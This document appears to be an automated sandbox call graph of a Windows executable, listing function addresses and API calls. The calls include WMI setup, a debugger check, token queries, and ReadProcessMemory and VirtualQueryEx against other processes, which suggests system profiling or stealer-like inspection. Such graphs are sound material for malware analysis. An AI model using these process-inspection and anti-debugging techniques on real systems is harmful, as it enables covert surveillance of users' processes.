18199->18200 18205 7ff6d9cfb680 18200->18205 18201 7ff6d9dbf4b0 25 API calls 18201->18205 18202 7ff6d9cfbf2c 18203 7ff6d9dc98f0 4 API calls 18202->18203 18204 7ff6d9cfbf31 18203->18204 18205->18201 18205->18202 18206 7ff6d9dc98f0 4 API calls 18205->18206 18206->18205 18208 7ff6d9dd0e8d GetErrorInfo 18207->18208 18209 7ff6d9dd0e17 CoInitializeSecurity 18207->18209 18210 7ff6d9cf8acc HeapFree 18208->18210 18209->18210 18211 7ff6d9dd0e58 GetErrorInfo 18209->18211 18210->18199 18211->18210 17259 7ff6d9cfaee2 17260 7ff6d9cf8baf 17259->17260 17261 7ff6d9cfaeee 17259->17261 17381 7ff6d9dd0ed0 CoCreateInstance 17260->17381 17264 7ff6d9cfb510 HeapFree 17267 7ff6d9cfabd2 17264->17267 17374 7ff6d9cfaca8 17267->17374 17450 7ff6d9dbf4b0 17267->17450 17269 7ff6d9cf8bfd 17269->17264 17270 7ff6d9dc9960 3 API calls 17269->17270 17272 7ff6d9cf8c7a 17270->17272 17271 7ff6d9dbf4b0 25 API calls 17279 7ff6d9cfb680 17271->17279 17272->17264 17273 7ff6d9dc9960 3 API calls 17272->17273 17277 7ff6d9cf8d3f 17273->17277 17274 7ff6d9cfbf2c 17275 7ff6d9dc98f0 4 API calls 17274->17275 17276 7ff6d9cfbf31 17275->17276 17277->17264 17278 7ff6d9dc9960 3 API calls 17277->17278 17281 7ff6d9cf8dee 17278->17281 17279->17271 17279->17274 17469 7ff6d9dc98f0 17279->17469 17281->17264 17282 7ff6d9dc9960 3 API calls 17281->17282 17283 7ff6d9cf8ecd 17282->17283 17283->17264 17284 7ff6d9dc9960 3 API calls 17283->17284 17285 7ff6d9cf8f8c 17284->17285 17285->17264 17286 7ff6d9dc9960 3 API calls 17285->17286 17287 7ff6d9cf9050 17286->17287 17287->17264 17288 7ff6d9dc9960 3 API calls 17287->17288 17289 7ff6d9cf912f 17288->17289 17289->17264 17290 7ff6d9dc9960 3 API calls 17289->17290 17291 7ff6d9cf91ec 17290->17291 17291->17264 17292 7ff6d9dc9960 3 API calls 17291->17292 17294 7ff6d9cf92b9 17292->17294 17293 7ff6d9dd08f0 23 API calls 17293->17294 17294->17264 17294->17293 17295 7ff6d9cfb4d2 GetErrorInfo 17294->17295 17296 7ff6d9cfb4fb 17294->17296 17299 7ff6d9cf9567 SysFreeString 17294->17299 17300 7ff6d9cf9575 SysFreeString 17294->17300 17304 7ff6d9cf9583 HeapFree 17294->17304 17305 7ff6d9cf9ad6 GetErrorInfo 17294->17305 17307 7ff6d9cfb542 17294->17307 17308 7ff6d9cf9b01 17294->17308 17309 7ff6d9cf1680 28 API calls 17294->17309 17311 7ff6d9dc9960 HeapAlloc GetProcessHeap HeapAlloc 17294->17311 17312 7ff6d9cf9b42 17294->17312 17318 7ff6d9cf97e0 GetErrorInfo 17294->17318 17323 7ff6d9cf9b7b 17294->17323 17325 7ff6d9cf9a4b HeapFree 17294->17325 17326 7ff6d9cf9a26 HeapFree 17294->17326 17327 7ff6d9cf9a7c HeapFree 17294->17327 17328 7ff6d9cf9aaa HeapFree 17294->17328 17329 7ff6d9cf99d8 HeapFree 17294->17329 17442 7ff6d9de6040 17294->17442 17295->17296 17297 7ff6d9cfb512 SysFreeString 17296->17297 17298 7ff6d9cfb506 17296->17298 17301 7ff6d9cfb520 SysFreeString 17297->17301 17302 7ff6d9cfb50b 17297->17302 17298->17301 17298->17302 17299->17294 17300->17294 17301->17264 17303 7ff6d9cfb52e HeapFree 17301->17303 17302->17264 17302->17303 17303->17307 17304->17294 17305->17308 17306 7ff6d9cf3d90 2 API calls 17306->17307 17307->17264 17307->17306 17308->17312 17446 7ff6d9cf3eb0 17308->17446 17309->17294 17311->17294 17312->17264 17313 7ff6d9cf9c0f 17312->17313 17314 7ff6d9cf9bf8 HeapFree 17312->17314 17315 7ff6d9cf9c38 HeapFree 17313->17315 17317 7ff6d9cfad34 HeapFree 17313->17317 17314->17313 17316 7ff6d9cf9ad1 17315->17316 17319 7ff6d9dd0ed0 30 API calls 17316->17319 17317->17313 17318->17294 17320 7ff6d9cf9c7a 17319->17320 17320->17264 17401 7ff6d9cf28b0 17320->17401 17323->17312 17324 7ff6d9cf9b88 HeapFree 17323->17324 17324->17312 17325->17294 17326->17294 17327->17294 17328->17316 17329->17294 17330 7ff6d9cf9da8 17330->17264 17332 7ff6d9cf9f11 17330->17332 17429 7ff6d9cf3d90 17330->17429 17333 7ff6d9cf9f30 17332->17333 17334 7ff6d9cf9f1e HeapFree 17332->17334 17335 7ff6d9dd0ed0 30 API calls 17333->17335 17334->17333 17336 7ff6d9cf9f55 17335->17336 17336->17264 17337 7ff6d9cf28b0 58 API calls 17336->17337 17338 7ff6d9cfa04e 17337->17338 17338->17264 17435 7ff6d9cf1210 17338->17435 17340 7ff6d9cfa2a6 17342 7ff6d9cfa2bd 17340->17342 17343 7ff6d9cfa2ab HeapFree 17340->17343 17341 7ff6d9cfa0c5 17341->17340 17344 7ff6d9cfa291 HeapFree 17341->17344 17345 7ff6d9cfa2e1 17342->17345 17348 7ff6d9cf3d90 2 API calls 17342->17348 17343->17342 17344->17341 17346 7ff6d9cfa2fb 17345->17346 17347 7ff6d9cfa2e9 HeapFree 17345->17347 17349 7ff6d9dd0ed0 30 API calls 17346->17349 17347->17346 17348->17342 17350 7ff6d9cfa323 17349->17350 17350->17264 17351 7ff6d9cf28b0 58 API calls 17350->17351 17354 7ff6d9cfa428 17351->17354 17352 7ff6d9cfa471 17353 7ff6d9cfa476 HeapFree 17352->17353 17356 7ff6d9cfa488 17352->17356 17353->17356 17354->17264 17354->17352 17355 7ff6d9cf3d90 2 API calls 17354->17355 17355->17354 17439 7ff6d9dd0570 GlobalMemoryStatusEx 17356->17439 17358 7ff6d9cfa4ab 17359 7ff6d9cf4140 25 API calls 17358->17359 17360 7ff6d9cfa4c0 17359->17360 17361 7ff6d9dd0570 GlobalMemoryStatusEx K32GetPerformanceInfo 17360->17361 17362 7ff6d9cfa4d8 GetTickCount64 17361->17362 17363 7ff6d9cf4140 25 API calls 17362->17363 17364 7ff6d9cfa4ee 17363->17364 17365 7ff6d9dd0ed0 30 API calls 17364->17365 17366 7ff6d9cfa508 17365->17366 17366->17264 17367 7ff6d9cf28b0 58 API calls 17366->17367 17368 7ff6d9cfa627 17367->17368 17368->17264 17379 7ff6d9cfa635 17368->17379 17369 7ff6d9cfabd4 17370 7ff6d9cfabc1 17369->17370 17372 7ff6d9cf3d90 HeapFree HeapFree 17369->17372 17370->17267 17371 7ff6d9cfac23 HeapFree 17370->17371 17371->17267 17372->17369 17373 7ff6d9cf3d90 HeapFree HeapFree 17373->17379 17375 7ff6d9cfab86 17376 7ff6d9cf3d90 HeapFree HeapFree 17375->17376 17377 7ff6d9cfab93 17376->17377 17377->17370 17378 7ff6d9cf3d90 HeapFree HeapFree 17377->17378 17378->17377 17379->17369 17379->17370 17379->17373 17379->17375 17380 7ff6d9cf4ce0 HeapAlloc GetProcessHeap HeapAlloc RtlReAllocateHeap 17379->17380 17380->17379 17382 7ff6d9dd0fe3 GetErrorInfo 17381->17382 17383 7ff6d9dd0f21 17381->17383 17394 7ff6d9cf8bcc 17382->17394 17383->17394 17474 7ff6d9dd08f0 17383->17474 17386 7ff6d9dd0f81 17388 7ff6d9dd1039 17386->17388 17389 7ff6d9dd0f8f 17386->17389 17387 7ff6d9dd1017 GetErrorInfo 17387->17388 17390 7ff6d9dd1047 SysFreeString 17388->17390 17388->17394 17391 7ff6d9dd0f94 SysFreeString 17389->17391 17392 7ff6d9dd0f9d CoSetProxyBlanket 17389->17392 17390->17394 17391->17392 17393 7ff6d9dd1070 GetErrorInfo 17392->17393 17392->17394 17393->17394 17394->17264 17395 7ff6d9dc9960 17394->17395 17396 7ff6d9dc9971 HeapAlloc 17395->17396 17397 7ff6d9dc9978 GetProcessHeap 17395->17397 17396->17397 17399 7ff6d9de6472 17397->17399 17400 7ff6d9de6456 HeapAlloc 17397->17400 17399->17269 17402 7ff6d9dd08f0 23 API calls 17401->17402 17403 7ff6d9cf28e0 17402->17403 17404 7ff6d9dd08f0 23 API calls 17403->17404 17405 7ff6d9cf28ee 17404->17405 17406 7ff6d9cf2a6d GetErrorInfo 17405->17406 17407 7ff6d9cf292d 17405->17407 17409 7ff6d9cf2a98 17406->17409 17408 7ff6d9cf293b 17407->17408 17407->17409 17412 7ff6d9cf2940 SysFreeString 17408->17412 17413 7ff6d9cf2949 17408->17413 17410 7ff6d9cf2aa3 SysFreeString 17409->17410 17411 7ff6d9cf2aac 17409->17411 17410->17411 17414 7ff6d9cf2ab1 SysFreeString 17411->17414 17419 7ff6d9cf2aba 17411->17419 17412->17413 17415 7ff6d9cf294e SysFreeString 17413->17415 17416 7ff6d9cf2957 17413->17416 17414->17419 17415->17416 17585 7ff6d9cf1000 17416->17585 17419->17330 17420 7ff6d9dc9960 3 API calls 17424 7ff6d9cf298d 17420->17424 17421 7ff6d9cf1000 31 API calls 17421->17424 17422 7ff6d9cf2b8a 17422->17330 17423 7ff6d9de6040 4 API calls 17423->17424 17424->17421 17424->17422 17424->17423 17425 7ff6d9cf2ac5 17424->17425 17425->17419 17426 7ff6d9cf2b11 17425->17426 17428 7ff6d9cf3d90 2 API calls 17425->17428 17426->17419 17427 7ff6d9cf2b16 HeapFree 17426->17427 17427->17419 17428->17425 17430 7ff6d9cf3e90 17429->17430 17433 7ff6d9cf3dad 17429->17433 17430->17330 17431 7ff6d9cf3e48 17431->17430 17432 7ff6d9cf3e6a HeapFree 17431->17432 17432->17430 17433->17431 17433->17433 17434 7ff6d9cf3e36 HeapFree 17433->17434 17434->17433 17436 7ff6d9cf122a 17435->17436 17437 7ff6d9dc9960 3 API calls 17436->17437 17438 7ff6d9cf136a 17436->17438 17437->17438 17438->17341 17440 7ff6d9dd05b6 K32GetPerformanceInfo 17439->17440 17441 7ff6d9dd064b 17440->17441 17443 7ff6d9de6052 17442->17443 17445 7ff6d9de60e5 17442->17445 17443->17445 17677 7ff6d9dc9d80 17443->17677 17445->17294 17447 7ff6d9cf3eca 17446->17447 17448 7ff6d9cf3eb9 17446->17448 17447->17448 17449 7ff6d9cf3ed6 HeapFree 17447->17449 17448->17312 17449->17447 17686 7ff6d9dbee20 17450->17686 17452 7ff6d9dbf65b 17452->17279 17453 7ff6d9dbf550 17463 7ff6d9dbf55c 17453->17463 17714 7ff6d9de6110 17453->17714 17454 7ff6d9dbf4c1 17454->17452 17454->17453 17455 7ff6d9dbf50b 17454->17455 17456 7ff6d9dbf5d6 17454->17456 17719 7ff6d9de5e50 17454->17719 17462 7ff6d9dbf52e 17455->17462 17728 7ff6d9de5f80 17455->17728 17456->17452 17731 7ff6d9dbf6c0 IsDebuggerPresent 17456->17731 17462->17453 17462->17456 17708 7ff6d9db9dc0 17462->17708 17463->17456 17465 7ff6d9dbf5d1 17463->17465 17466 7ff6d9dbf621 HeapFree 17463->17466 17468 7ff6d9dbf60f HeapFree 17463->17468 17465->17456 17467 7ff6d9dbf64d WakeByAddressSingle 17465->17467 17466->17465 17467->17456 17468->17466 17765 7ff6d9dc9900 17469->17765 17471 7ff6d9dc98f9 17770 7ff6d9dc9950 ExitProcess 17471->17770 17475 7ff6d9dd0905 17474->17475 17482 7ff6d9dd0920 17474->17482 17476 7ff6d9dd0bc5 17475->17476 17477 7ff6d9dc9960 3 API calls 17475->17477 17478 7ff6d9dd0a04 17477->17478 17478->17476 17479 7ff6d9dd0b50 17478->17479 17487 7ff6d9de8850 17478->17487 17479->17476 17481 7ff6d9dd0b68 SysAllocStringLen 17479->17481 17486 7ff6d9dd0b88 17479->17486 17481->17476 17484 7ff6d9dd0b78 SysStringLen 17481->17484 17482->17386 17482->17387 17483 7ff6d9dd0b8d HeapFree 17483->17482 17485 7ff6d9dd0bbc SysFreeString 17484->17485 17484->17486 17485->17476 17486->17482 17486->17483 17488 7ff6d9de885f 17487->17488 17492 7ff6d9de88c5 17487->17492 17488->17492 17494 7ff6d9dd0bd0 17488->17494 17493 7ff6d9de88cc 17492->17493 17500 7ff6d9dd6a1c 17492->17500 17493->17478 17495 7ff6d9dd0be3 17494->17495 17496 7ff6d9dd0c01 17494->17496 17495->17496 17497 7ff6d9dd0bea HeapReAlloc 17495->17497 17498 7ff6d9dd0c17 17496->17498 17499 7ff6d9dc9960 3 API calls 17496->17499 17497->17498 17498->17492 17499->17498 17503 7ff6d9dd8584 GetLastError 17500->17503 17504 7ff6d9dd85ad 17503->17504 17505 7ff6d9dd85a8 17503->17505 17509 7ff6d9dd85f6 17504->17509 17527 7ff6d9dd99c4 17504->17527 17522 7ff6d9dd7d8c 17505->17522 17511 7ff6d9dd8605 SetLastError 17509->17511 17512 7ff6d9dd85fb SetLastError 17509->17512 17515 7ff6d9dd6a3a 17511->17515 17512->17515 17513 7ff6d9dd85cc 17534 7ff6d9dd8c00 17513->17534 17515->17478 17517 7ff6d9dd85d3 17517->17512 17518 7ff6d9dd85ea 17545 7ff6d9dd86ac 17518->17545 17550 7ff6d9dd8210 17522->17550 17525 7ff6d9dd7dce TlsGetValue 17526 7ff6d9dd7dbf 17525->17526 17526->17504 17528 7ff6d9dd99d5 17527->17528 17529 7ff6d9dd9a26 17528->17529 17530 7ff6d9dd9a0a HeapAlloc 17528->17530 17559 7ff6d9dd8f98 17528->17559 17562 7ff6d9dd9348 17529->17562 17530->17528 17531 7ff6d9dd85c4 17530->17531 17531->17513 17540 7ff6d9dd7de4 17531->17540 17535 7ff6d9dd8c05 HeapFree 17534->17535 17539 7ff6d9dd8c35 17534->17539 17536 7ff6d9dd8c20 17535->17536 17535->17539 17537 7ff6d9dd9348 13 API calls 17536->17537 17538 7ff6d9dd8c25 GetLastError 17537->17538 17538->17539 17539->17517 17541 7ff6d9dd8210 5 API calls 17540->17541 17542 7ff6d9dd7e17 17541->17542 17543 7ff6d9dd7e31 TlsSetValue 17542->17543 17544 7ff6d9dd7e1f 17542->17544 17543->17544 17544->17513 17544->17518 17571 7ff6d9dd8874 17545->17571 17551 7ff6d9dd7db7 17550->17551 17555 7ff6d9dd826c 17550->17555 17551->17525 17551->17526 17552 7ff6d9dd831e 17552->17551 17554 7ff6d9dd832c GetProcAddress 17552->17554 17553 7ff6d9dd8299 LoadLibraryExW 17553->17555 17556 7ff6d9dd82ba GetLastError 17553->17556 17554->17551 17555->17551 17555->17552 17555->17553 17558 7ff6d9dd8303 FreeLibrary 17555->17558 17556->17555 17557 7ff6d9dd82c5 LoadLibraryExW 17556->17557 17557->17555 17558->17555 17565 7ff6d9dd8fe0 17559->17565 17563 7ff6d9dd8584 15 API calls 17562->17563 17564 7ff6d9dd9351 17563->17564 17564->17531 17570 7ff6d9dd8430 EnterCriticalSection 17565->17570 17583 7ff6d9dd8430 EnterCriticalSection 17571->17583 17586 7ff6d9cf1045 17585->17586 17587 7ff6d9cf104b 17586->17587 17588 7ff6d9cf10c8 GetErrorInfo 17586->17588 17589 7ff6d9cf1056 17587->17589 17590 7ff6d9cf10e8 17587->17590 17588->17590 17593 7ff6d9cf107e 17589->17593 17597 7ff6d9cf1680 17589->17597 17592 7ff6d9cf1113 17590->17592 17590->17593 17594 7ff6d9cf3eb0 HeapFree 17592->17594 17595 7ff6d9cf10a0 17593->17595 17596 7ff6d9cf11c6 HeapFree 17593->17596 17594->17595 17595->17419 17595->17420 17596->17595 17599 7ff6d9cf16eb 17597->17599 17598 7ff6d9cf17df GetErrorInfo 17605 7ff6d9cf1804 17598->17605 17599->17598 17600 7ff6d9cf1811 SafeArrayDestroy 17599->17600 17606 7ff6d9cf171c 17599->17606 17601 7ff6d9cf266f GetErrorInfo 17600->17601 17602 7ff6d9cf185f 17600->17602 17604 7ff6d9cf2692 17601->17604 17602->17605 17607 7ff6d9cf18bc ProcessPrng 17602->17607 17629 7ff6d9cf1889 17602->17629 17603 7ff6d9cf2644 SafeArrayDestroy 17603->17601 17603->17602 17604->17605 17608 7ff6d9cf2743 HeapFree 17604->17608 17605->17593 17606->17603 17609 7ff6d9cf17bd RtlReAllocateHeap 17606->17609 17610 7ff6d9cf263a 17606->17610 17616 7ff6d9cf17dd 17606->17616 17607->17629 17608->17605 17609->17603 17609->17616 17610->17603 17611 7ff6d9cf253c 17612 7ff6d9cf2556 17611->17612 17614 7ff6d9cf2629 HeapFree 17611->17614 17612->17605 17613 7ff6d9cf27db HeapFree 17612->17613 17613->17605 17614->17611 17615 7ff6d9dc9960 3 API calls 17615->17629 17616->17598 17617 7ff6d9cf1ab5 GetProcessHeap HeapAlloc 17617->17616 17624 7ff6d9cf1ade 17617->17624 17618 7ff6d9cf1cd0 GetErrorInfo 17619 7ff6d9cf21c3 VariantClear 17618->17619 17618->17629 17628 7ff6d9cf2248 17619->17628 17619->17629 17620 7ff6d9cf25c4 HeapFree 17621 7ff6d9cf25db 17620->17621 17622 7ff6d9cf3d90 2 API calls 17621->17622 17622->17611 17623 7ff6d9cf221b GetProcessHeap HeapFree 17623->17628 17623->17629 17624->17629 17627 7ff6d9cf224d VariantClear 17627->17629 17628->17620 17628->17621 17629->17611 17629->17615 17629->17616 17629->17617 17629->17618 17629->17619 17629->17623 17629->17627 17629->17628 17631 7ff6d9cf249d HeapFree 17629->17631 17632 7ff6d9cf7210 17629->17632 17638 7ff6d9ddef40 17629->17638 17644 7ff6d9dd2010 17629->17644 17631->17629 17633 7ff6d9cf7233 17632->17633 17661 7ff6d9d28d20 17633->17661 17635 7ff6d9cf75b4 17635->17629 17636 7ff6d9cf7716 HeapFree 17636->17635 17637 7ff6d9cf74b6 17637->17635 17637->17636 17639 7ff6d9ddef61 17638->17639 17641 7ff6d9ddefa7 17638->17641 17640 7ff6d9dc9960 3 API calls 17639->17640 17639->17641 17643 7ff6d9ddf095 17640->17643 17641->17629 17642 7ff6d9ddf2ad HeapFree 17642->17641 17643->17641 17643->17642 17643->17643 17645 7ff6d9dd202d 17644->17645 17646 7ff6d9dd2071 17645->17646 17647 7ff6d9dd2182 17645->17647 17648 7ff6d9dd20e5 17645->17648 17646->17629 17650 7ff6d9dc9960 3 API calls 17647->17650 17649 7ff6d9dd2010 3 API calls 17648->17649 17649->17646 17651 7ff6d9dd219b 17650->17651 17652 7ff6d9dd21a4 17651->17652 17658 7ff6d9dd357d 17651->17658 17653 7ff6d9dd2010 3 API calls 17652->17653 17654 7ff6d9dd21b8 17653->17654 17654->17646 17655 7ff6d9dd21d3 HeapFree 17654->17655 17655->17646 17656 7ff6d9dd2010 3 API calls 17656->17658 17657 7ff6d9dd36a1 17657->17629 17658->17656 17659 7ff6d9dd363d 17658->17659 17659->17657 17660 7ff6d9dd3709 HeapFree 17659->17660 17660->17657 17662 7ff6d9d28d51 17661->17662 17663 7ff6d9d28d3f 17661->17663 17666 7ff6d9d28e2a 17662->17666 17667 7ff6d9de14f0 17662->17667 17663->17662 17665 7ff6d9dc9960 3 API calls 17663->17665 17665->17662 17666->17637 17668 7ff6d9de14fb 17667->17668 17670 7ff6d9de1551 17667->17670 17668->17670 17671 7ff6d9d29420 17668->17671 17670->17666 17672 7ff6d9d29451 17671->17672 17673 7ff6d9d29433 17671->17673 17674 7ff6d9dc9960 3 API calls 17672->17674 17673->17672 17675 7ff6d9d2943a HeapReAlloc 17673->17675 17676 7ff6d9d29462 17674->17676 17675->17676 17676->17670 17678 7ff6d9dc9d97 17677->17678 17682 7ff6d9dc9db5 17677->17682 17679 7ff6d9dc9d9e RtlReAllocateHeap 17678->17679 17678->17682 17685 7ff6d9dc9dd1 17679->17685 17680 7ff6d9dc9de5 17684 7ff6d9dc9960 3 API calls 17680->17684 17681 7ff6d9dc9dc7 17683 7ff6d9dc9960 3 API calls 17681->17683 17682->17680 17682->17681 17682->17685 17683->17685 17684->17685 17685->17445 17687 7ff6d9dbee3a 17686->17687 17707 7ff6d9dbef5c 17686->17707 17688 7ff6d9dbee6b 17687->17688 17687->17707 17733 7ff6d9de62b0 17687->17733 17690 7ff6d9dbeeb3 17688->17690 17691 7ff6d9dbf038 17688->17691 17688->17707 17694 7ff6d9dbeee6 17690->17694 17695 7ff6d9dbef6c 17690->17695 17692 7ff6d9de6110 2 API calls 17691->17692 17693 7ff6d9dbf040 17692->17693 17698 7ff6d9dbf06e 17693->17698 17699 7ff6d9de6040 4 API calls 17693->17699 17694->17693 17697 7ff6d9dbeeef 17694->17697 17696 7ff6d9dbefb2 HeapFree 17695->17696 17695->17697 17702 7ff6d9dbefa0 HeapFree 17695->17702 17696->17697 17703 7ff6d9dbefd4 17696->17703 17697->17703 17704 7ff6d9dbef39 HeapFree 17697->17704 17705 7ff6d9dbef27 HeapFree 17697->17705 17698->17454 17699->17698 17700 7ff6d9dbefee WakeByAddressSingle 17701 7ff6d9dbef57 17700->17701 17701->17707 17746 7ff6d9dbeda0 17701->17746 17702->17696 17703->17700 17703->17701 17704->17700 17704->17701 17705->17704 17707->17454 17709 7ff6d9db9dce 17708->17709 17712 7ff6d9db9dec 17708->17712 17710 7ff6d9db9ddd HeapFree 17709->17710 17709->17712 17710->17712 17711 7ff6d9db9e11 17711->17453 17712->17711 17713 7ff6d9db9df9 HeapFree 17712->17713 17713->17711 17718 7ff6d9de6121 17714->17718 17715 7ff6d9de6150 17715->17463 17716 7ff6d9de617c WaitOnAddress 17717 7ff6d9de619a GetLastError 17716->17717 17716->17718 17717->17718 17718->17715 17718->17716 17720 7ff6d9de5f27 17719->17720 17721 7ff6d9de5e76 17719->17721 17722 7ff6d9dba490 2 API calls 17720->17722 17723 7ff6d9dbaa70 4 API calls 17721->17723 17726 7ff6d9de5eb0 17721->17726 17724 7ff6d9de5f6a 17722->17724 17723->17726 17725 7ff6d9dba540 2 API calls 17724->17725 17727 7ff6d9de5f72 17725->17727 17726->17455 17729 7ff6d9dc9960 3 API calls 17728->17729 17730 7ff6d9de5f97 17729->17730 17730->17462 17732 7ff6d9dbf6b9 17731->17732 17734 7ff6d9de62f1 17733->17734 17735 7ff6d9de63e4 17734->17735 17736 7ff6d9de633a 17734->17736 17739 7ff6d9de6374 17734->17739 17755 7ff6d9dba490 17735->17755 17736->17739 17751 7ff6d9dbaa70 17736->17751 17739->17688 17744 7ff6d9de6472 17744->17688 17745 7ff6d9de6456 HeapAlloc 17747 7ff6d9dbedaf HeapFree 17746->17747 17748 7ff6d9dbedc2 17746->17748 17747->17748 17749 7ff6d9dbede7 17748->17749 17750 7ff6d9dbedcf HeapFree 17748->17750 17749->17707 17750->17749 17752 7ff6d9dbab28 17751->17752 17753 7ff6d9dbaa99 17751->17753 17752->17739 17753->17752 17754 7ff6d9dc9d80 4 API calls 17753->17754 17754->17752 17757 7ff6d9dba4b9 17755->17757 17756 7ff6d9dba534 17760 7ff6d9dba540 17756->17760 17757->17756 17758 7ff6d9dba522 HeapFree 17757->17758 17759 7ff6d9dba50d HeapFree 17757->17759 17758->17756 17759->17758 17761 7ff6d9dba5aa GetProcessHeap 17760->17761 17764 7ff6d9dba554 17760->17764 17761->17744 17761->17745 17762 7ff6d9dba590 HeapFree 17762->17761 17763 7ff6d9dba57e HeapFree 17763->17762 17764->17762 17764->17763 17766 7ff6d9dc9914 17765->17766 17767 7ff6d9dc990f 17765->17767 17771 7ff6d9de5ca0 17766->17771 17767->17471 17772 7ff6d9de5cbc 17771->17772 17773 7ff6d9de5d2d 17771->17773 17772->17773 17774 7ff6d9dc993d 17772->17774 17775 7ff6d9de5d06 WaitOnAddress 17772->17775 17773->17774 17777 7ff6d9de5de8 WakeByAddressAll 17773->17777 17774->17471 17775->17772 17776 7ff6d9de5d24 GetLastError 17775->17776 17776->17772 17777->17774 17785 7ff6d9dcda50 17786 7ff6d9dcda75 17785->17786 17795 7ff6d9dcdb20 17785->17795 17787 7ff6d9dcdafc GetSystemTimes 17786->17787 17788 7ff6d9dcdac9 GetProcessTimes 17786->17788 17791 7ff6d9dcdb1b GetLastError 17787->17791 17787->17795 17788->17787 17789 7ff6d9dcdaf7 GetLastError 17788->17789 17789->17787 17790 7ff6d9dcdc84 GetProcessIoCounters 17792 7ff6d9dcde29 GetLastError 17790->17792 17793 7ff6d9dcdbd9 17790->17793 17791->17795 17792->17793 17794 7ff6d9dcdd1b OpenProcessToken 17793->17794 17796 7ff6d9dcde54 17793->17796 17798 7ff6d9dcdd42 17794->17798 17799 7ff6d9dcde4f GetLastError 17794->17799 17795->17790 17795->17793 17797 7ff6d9dcdec6 NtQueryInformationProcess 17796->17797 17815 7ff6d9dce19d 17796->17815 17801 7ff6d9dcdefd 17797->17801 17797->17815 17798->17796 17802 7ff6d9dcdd58 GetTokenInformation 17798->17802 17799->17796 17800 7ff6d9dce2b5 17803 7ff6d9dcdf0e ReadProcessMemory 17801->17803 17804 7ff6d9dce046 NtQueryInformationProcess 17801->17804 17805 7ff6d9dcdd82 GetLastError 17802->17805 17806 7ff6d9dcdda1 GetProcessHeap 17802->17806 17807 7ff6d9dcdf36 ReadProcessMemory 17803->17807 17808 7ff6d9dce198 GetLastError 17803->17808 17812 7ff6d9dce074 ReadProcessMemory 17804->17812 17804->17815 17805->17806 17809 7ff6d9dcde42 CloseHandle 17805->17809 17810 7ff6d9dcddba HeapAlloc 17806->17810 17811 7ff6d9dcde3d GetLastError 17806->17811 17807->17808 17822 7ff6d9dcdf65 17807->17822 17808->17815 17809->17796 17809->17799 17810->17809 17813 7ff6d9dcddd0 GetTokenInformation 17810->17813 17811->17809 17812->17808 17816 7ff6d9dce0bb ReadProcessMemory 17812->17816 17818 7ff6d9dce331 GetLastError 17813->17818 17819 7ff6d9dcddf6 17813->17819 17814 7ff6d9dce24a HeapFree 17814->17800 17815->17800 17817 7ff6d9dce1ec K32GetModuleFileNameExW 17815->17817 17845 7ff6d9dce236 17815->17845 17816->17808 17836 7ff6d9dce0eb 17816->17836 17830 7ff6d9dce200 17817->17830 17821 7ff6d9dcf020 2 API calls 17818->17821 17991 7ff6d9dcf060 17819->17991 17827 7ff6d9dce33e CloseHandle 17821->17827 17823 7ff6d9dcdfc9 17822->17823 17826 7ff6d9dce4f1 17822->17826 18007 7ff6d9de7fa9 17822->18007 17831 7ff6d9dcdfdf 17823->17831 17832 7ff6d9dce3d8 17823->17832 17825 7ff6d9dce522 VirtualQueryEx 17843 7ff6d9dce655 17825->17843 17851 7ff6d9dce553 17825->17851 17826->17825 17861 7ff6d9dce6ae 17826->17861 17827->17796 17837 7ff6d9dce34f 17827->17837 17828 7ff6d9dce31e 17838 7ff6d9dceb4e VirtualQueryEx 17828->17838 17867 7ff6d9dcec19 17828->17867 17962 7ff6d9dbade0 17830->17962 17950 7ff6d9dcf390 NtQueryInformationProcess 17831->17950 17839 7ff6d9dc9960 3 API calls 17832->17839 17833 7ff6d9dce354 17848 7ff6d9dce373 HeapFree 17833->17848 17849 7ff6d9dce389 17833->17849 17834 7ff6d9dcde17 18002 7ff6d9dcf020 GetProcessHeap 17834->18002 17836->17828 17840 7ff6d9de7fa9 3 API calls 17836->17840 17858 7ff6d9dce151 17836->17858 17837->17799 17852 7ff6d9dceb73 17838->17852 17853 7ff6d9dceba6 17838->17853 17855 7ff6d9dce3f0 17839->17855 17840->17858 17844 7ff6d9dce691 17843->17844 17872 7ff6d9dce680 HeapFree 17843->17872 17844->17861 17862 7ff6d9dce69c HeapFree 17844->17862 17845->17800 17845->17814 17846 7ff6d9dcea40 17860 7ff6d9dcf160 6 API calls 17846->17860 17847 7ff6d9dce167 17857 7ff6d9dcf390 14 API calls 17847->17857 17848->17849 17864 7ff6d9dcf020 2 API calls 17849->17864 17850 7ff6d9dce9f3 17851->17850 17874 7ff6d9dc9960 3 API calls 17851->17874 17981 7ff6d9dcf160 17852->17981 17854 7ff6d9dcebf5 17853->17854 17879 7ff6d9dcebe0 HeapFree 17853->17879 17866 7ff6d9dcec05 HeapFree 17854->17866 17854->17867 17855->17850 17868 7ff6d9dce3f9 ReadProcessMemory 17855->17868 17856 7ff6d9dcdfec 17869 7ff6d9dce4d2 17856->17869 17891 7ff6d9dce034 HeapFree 17856->17891 17873 7ff6d9dce174 17857->17873 17858->17846 17858->17847 17871 7ff6d9dcea4d 17860->17871 17861->17815 17863 7ff6d9dc9960 3 API calls 17861->17863 17862->17861 17875 7ff6d9dce76c 17863->17875 17876 7ff6d9dce3a6 17864->17876 17866->17867 17867->17850 17886 7ff6d9dc9960 3 API calls 17867->17886 17880 7ff6d9dce425 17868->17880 17881 7ff6d9dce457 GetLastError 17868->17881 17869->17826 17882 7ff6d9dce4dd HeapFree 17869->17882 17892 7ff6d9dcf260 9 API calls 17871->17892 17916 7ff6d9dcea57 17871->17916 17872->17843 17883 7ff6d9dce2ff 17873->17883 17903 7ff6d9dce273 HeapFree 17873->17903 17884 7ff6d9dce5a9 17874->17884 17875->17850 17887 7ff6d9dce775 ReadProcessMemory 17875->17887 17888 7ff6d9dcf140 CloseHandle 17876->17888 17878 7ff6d9dcec40 17910 7ff6d9dcec9d HeapFree 17878->17910 17929 7ff6d9dcecb2 17878->17929 17879->17853 17889 7ff6d9dce45c HeapFree 17880->17889 17890 7ff6d9dce42c 17880->17890 17881->17889 17882->17826 17883->17828 17894 7ff6d9dce30a HeapFree 17883->17894 17884->17850 17895 7ff6d9dce5b2 ReadProcessMemory 17884->17895 17885 7ff6d9dcde27 17885->17796 17893 7ff6d9dcee70 17886->17893 17896 7ff6d9dce885 GetLastError 17887->17896 17897 7ff6d9dce7a7 17887->17897 17888->17885 17900 7ff6d9dce489 17889->17900 18011 7ff6d9dcf260 CommandLineToArgvW 17890->18011 17891->17856 17904 7ff6d9dcea92 17892->17904 17893->17850 17905 7ff6d9dcee79 ReadProcessMemory 17893->17905 17894->17828 17901 7ff6d9dce63e GetLastError 17895->17901 